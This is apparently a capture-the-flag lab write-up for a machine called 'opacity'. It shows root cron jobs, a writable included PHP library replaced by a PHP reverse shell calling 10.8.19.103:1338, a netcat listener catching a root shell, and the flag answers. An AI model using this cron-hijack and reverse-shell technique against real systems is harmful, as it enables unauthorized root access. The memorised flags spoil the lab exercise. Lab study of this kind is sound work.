2023/04/10 00:29:16 CMD: UID=0 PID=760 | /usr/sbin/apache2 -k start
2023/04/10 00:29:16 CMD: UID=0 PID=744 | /usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal
2023/04/10 00:29:16 CMD: UID=0 PID=723 | /usr/sbin/ModemManager
2023/04/10 00:29:16 CMD: UID=0 PID=678 | sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
2023/04/10 00:29:16 CMD: UID=0 PID=639 | /sbin/agetty -o -p -- \u --noclear tty1 linux
2023/04/10 00:29:16 CMD: UID=0 PID=637 | /sbin/agetty -o -p -- \u --keep-baud 115200,38400,9600 ttyS0 vt220
2023/04/10 00:29:16 CMD: UID=1 PID=629 | /usr/sbin/atd -f
2023/04/10 00:29:16 CMD: UID=0 PID=626 | /usr/lib/udisks2/udisksd
2023/04/10 00:29:16 CMD: UID=0 PID=621 | /lib/systemd/systemd-logind
2023/04/10 00:29:16 CMD: UID=0 PID=619 | /usr/lib/snapd/snapd
2023/04/10 00:29:16 CMD: UID=104 PID=617 | /usr/sbin/rsyslogd -n -iNONE
2023/04/10 00:29:16 CMD: UID=0 PID=614 | /usr/lib/policykit-1/polkitd --no-debug
2023/04/10 00:29:16 CMD: UID=0 PID=612 | php-fpm: master process (/etc/php/7.4/fpm/php-fpm.conf)
2023/04/10 00:29:16 CMD: UID=0 PID=610 | /usr/sbin/nmbd --foreground --no-process-group
2023/04/10 00:29:16 CMD: UID=0 PID=606 | /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
2023/04/10 00:29:16 CMD: UID=103 PID=594 | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
2023/04/10 00:29:16 CMD: UID=0 PID=591 | /usr/sbin/cron -f
2023/04/10 00:29:16 CMD: UID=0 PID=584 | /usr/bin/amazon-ssm-agent
2023/04/10 00:29:16 CMD: UID=0 PID=583 | /usr/lib/accountsservice/accounts-daemon
2023/04/10 00:29:16 CMD: UID=101 PID=572 | /lib/systemd/systemd-resolved
2023/04/10 00:29:16 CMD: UID=100 PID=569 | /lib/systemd/systemd-networkd
2023/04/10 00:29:16 CMD: UID=102 PID=536 | /lib/systemd/systemd-timesyncd
2023/04/10 00:29:16 CMD: UID=0 PID=516 |
2023/04/10 00:29:16 CMD: UID=0 PID=515 |
2023/04/10 00:29:16 CMD: UID=0 PID=508 |
2023/04/10 00:29:16 CMD: UID=0 PID=507 |
2023/04/10 00:29:16 CMD: UID=0 PID=506 |
2023/04/10 00:29:16 CMD: UID=0 PID=502 |
2023/04/10 00:29:16 CMD: UID=0 PID=499 |
2023/04/10 00:29:16 CMD: UID=0 PID=497 |
2023/04/10 00:29:16 CMD: UID=0 PID=489 | /sbin/multipathd -d -s
2023/04/10 00:29:16 CMD: UID=0 PID=488 |
2023/04/10 00:29:16 CMD: UID=0 PID=487 |
2023/04/10 00:29:16 CMD: UID=0 PID=486 |
2023/04/10 00:29:16 CMD: UID=0 PID=485 |
2023/04/10 00:29:16 CMD: UID=0 PID=378 | /lib/systemd/systemd-udevd
2023/04/10 00:29:16 CMD: UID=0 PID=344 | /lib/systemd/systemd-journald
2023/04/10 00:29:16 CMD: UID=0 PID=274 |
2023/04/10 00:29:16 CMD: UID=0 PID=273 |
2023/04/10 00:29:16 CMD: UID=0 PID=226 |
2023/04/10 00:29:16 CMD: UID=0 PID=189 |
2023/04/10 00:29:16 CMD: UID=0 PID=157 |
2023/04/10 00:29:16 CMD: UID=0 PID=122 |
2023/04/10 00:29:16 CMD: UID=0 PID=109 |
2023/04/10 00:29:16 CMD: UID=0 PID=106 |
2023/04/10 00:29:16 CMD: UID=0 PID=97 |
2023/04/10 00:29:16 CMD: UID=0 PID=96 |
2023/04/10 00:29:16 CMD: UID=0 PID=95 |
2023/04/10 00:29:16 CMD: UID=0 PID=93 |
2023/04/10 00:29:16 CMD: UID=0 PID=92 |
2023/04/10 00:29:16 CMD: UID=0 PID=91 |
2023/04/10 00:29:16 CMD: UID=0 PID=90 |
2023/04/10 00:29:16 CMD: UID=0 PID=89 |
2023/04/10 00:29:16 CMD: UID=0 PID=88 |
2023/04/10 00:29:16 CMD: UID=0 PID=87 |
2023/04/10 00:29:16 CMD: UID=0 PID=86 |
2023/04/10 00:29:16 CMD: UID=0 PID=84 |
2023/04/10 00:29:16 CMD: UID=0 PID=83 |
2023/04/10 00:29:16 CMD: UID=0 PID=79 |
2023/04/10 00:29:16 CMD: UID=0 PID=78 |
2023/04/10 00:29:16 CMD: UID=0 PID=77 |
2023/04/10 00:29:16 CMD: UID=0 PID=76 |
2023/04/10 00:29:16 CMD: UID=0 PID=75 |
2023/04/10 00:29:16 CMD: UID=0 PID=74 |
2023/04/10 00:29:16 CMD: UID=0 PID=73 |
2023/04/10 00:29:16 CMD: UID=0 PID=72 |
2023/04/10 00:29:16 CMD: UID=0 PID=71 |
2023/04/10 00:29:16 CMD: UID=0 PID=70 |
2023/04/10 00:29:16 CMD: UID=0 PID=24 |
2023/04/10 00:29:16 CMD: UID=0 PID=23 |
2023/04/10 00:29:16 CMD: UID=0 PID=22 |
2023/04/10 00:29:16 CMD: UID=0 PID=21 |
2023/04/10 00:29:16 CMD: UID=0 PID=20 |
2023/04/10 00:29:16 CMD: UID=0 PID=19 |
2023/04/10 00:29:16 CMD: UID=0 PID=18 |
2023/04/10 00:29:16 CMD: UID=0 PID=17 |
2023/04/10 00:29:16 CMD: UID=0 PID=16 |
2023/04/10 00:29:16 CMD: UID=0 PID=15 |
2023/04/10 00:29:16 CMD: UID=0 PID=14 |
2023/04/10 00:29:16 CMD: UID=0 PID=12 |
2023/04/10 00:29:16 CMD: UID=0 PID=11 |
2023/04/10 00:29:16 CMD: UID=0 PID=10 |
2023/04/10 00:29:16 CMD: UID=0 PID=9 |
2023/04/10 00:29:16 CMD: UID=0 PID=8 |
2023/04/10 00:29:16 CMD: UID=0 PID=6 |
2023/04/10 00:29:16 CMD: UID=0 PID=4 |
2023/04/10 00:29:16 CMD: UID=0 PID=3 |
2023/04/10 00:29:16 CMD: UID=0 PID=2 |
2023/04/10 00:29:16 CMD: UID=0 PID=1 | /sbin/init maybe-ubiquity
2023/04/10 00:30:01 CMD: UID=0 PID=27658 | /usr/sbin/CRON -f
2023/04/10 00:30:01 CMD: UID=0 PID=27657 | /usr/sbin/CRON -f
2023/04/10 00:30:02 CMD: UID=0 PID=27659 | /usr/bin/php /home/sysadmin/scripts/script.php
2023/04/10 00:31:01 CMD: UID=0 PID=27661 | /usr/sbin/CRON -f
2023/04/10 00:31:01 CMD: UID=0 PID=27660 | /usr/sbin/CRON -f
2023/04/10 00:31:01 CMD: UID=0 PID=27662 | /bin/sh -c /usr/bin/php /home/sysadmin/scripts/script.php
2023/04/10 00:32:01 CMD: UID=0 PID=27665 | /usr/sbin/CRON -f
2023/04/10 00:32:01 CMD: UID=0 PID=27664 | /usr/sbin/CRON -f
2023/04/10 00:32:01 CMD: UID=0 PID=27666 | /bin/sh -c /usr/bin/php /home/sysadmin/scripts/script.php
2023/04/10 00:33:01 CMD: UID=0 PID=27669 | /usr/sbin/CRON -f
2023/04/10 00:33:01 CMD: UID=0 PID=27668 | /usr/sbin/CRON -f
2023/04/10 00:33:01 CMD: UID=0 PID=27670 | /bin/sh -c /usr/bin/php /home/sysadmin/scripts/script.php
sysadmin@opacity:/tmp$ cd /home/sysadmin/scripts/
sysadmin@opacity:~/scripts$ ls
lib script.php
sysadmin@opacity:~/scripts$ cat script.php
<?php
//Backup of scripts sysadmin folder
require_once('lib/backup.inc.php');
zipData('/home/sysadmin/scripts', '/var/backups/backup.zip');
echo 'Successful', PHP_EOL;
//Files scheduled removal
$dir = "/var/www/html/cloud/images";
if(file_exists($dir)){
$di = new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS);
$ri = new RecursiveIteratorIterator($di, RecursiveIteratorIterator::CHILD_FIRST);
foreach ( $ri as $file ) {
$file->isDir() ? rmdir($file) : unlink($file);
}
}
?>
sysadmin@opacity:~/scripts/lib$ cat backup.inc.php
<?php
ini_set('max_execution_time', 600);
ini_set('memory_limit', '1024M');
function zipData($source, $destination) {
if (extension_loaded('zip')) {
if (file_exists($source)) {
$zip = new ZipArchive();
if ($zip->open($destination, ZIPARCHIVE::CREATE)) {
$source = realpath($source);
if (is_dir($source)) {
$files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source, RecursiveDirectoryIterator::SKIP_DOTS), RecursiveIteratorIterator::SELF_FIRST);
foreach ($files as $file) {
$file = realpath($file);
if (is_dir($file)) {
$zip->addEmptyDir(str_replace($source . '/', '', $file . '/'));
} else if (is_file($file)) {
$zip->addFromString(str_replace($source . '/', '', $file), file_get_contents($file));
}
}
} else if (is_file($source)) {
$zip->addFromString(basename($source), file_get_contents($source));
}
}
return $zip->close();
}
}
return false;
}
?>
sysadmin@opacity:~/scripts/lib$ rm backup.inc.php
rm: remove write-protected regular file 'backup.inc.php'? yes
sysadmin@opacity:~/scripts/lib$ ls
application.php dataresource.php owlapi.php registry.php
bio2rdfapi.php dataset.php phplib.php utils.php
biopax2bio2rdf.php fileapi.php rdfapi.php xmlapi.php
sysadmin@opacity:~/scripts/lib$ nano backup.inc.php
sysadmin@opacity:~/scripts/lib$ tail backup.inc.php
}
echo '<pre>';
// change the host address and/or port number as necessary
$sh = new Shell('10.8.19.103', 1338);
$sh->run();
unset($sh);
// garbage collector requires PHP v5.3.0 or greater
// @gc_collect_cycles();
echo '</pre>';
?>
┌──(witty㉿kali)-[~/Downloads]
└─$ rlwrap nc -lvnp 1338
listening on [any] 1338 ...
connect to [10.8.19.103] from (UNKNOWN) [10.10.142.194] 46062
SOCKET: Shell has connected! PID: 27916
whoami
root
cd /root
ls
proof.txt
snap
cat proof.txt
ac0d56f93202dd57dcb2498c739fd20e
cd snap
ls
lxd
What is the local.txt flag?
6661b61b44d234d230d06bf5b3c075e2
What is the proof.txt flag?
ac0d56f93202dd57dcb2498c739fd20e
[[PWN101]]
